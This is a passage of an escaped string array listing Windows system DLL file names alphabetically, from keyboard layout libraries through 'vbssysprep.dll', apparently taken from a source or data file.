\"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", \"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", \"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", \"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", \"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", \"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", \"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", \"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", \"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", \"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", \"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", \"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", \"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", \"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", \"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", \"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", \"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", \"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", \"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", \"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", \"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", \"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", \"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", \"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", \"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", \"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", 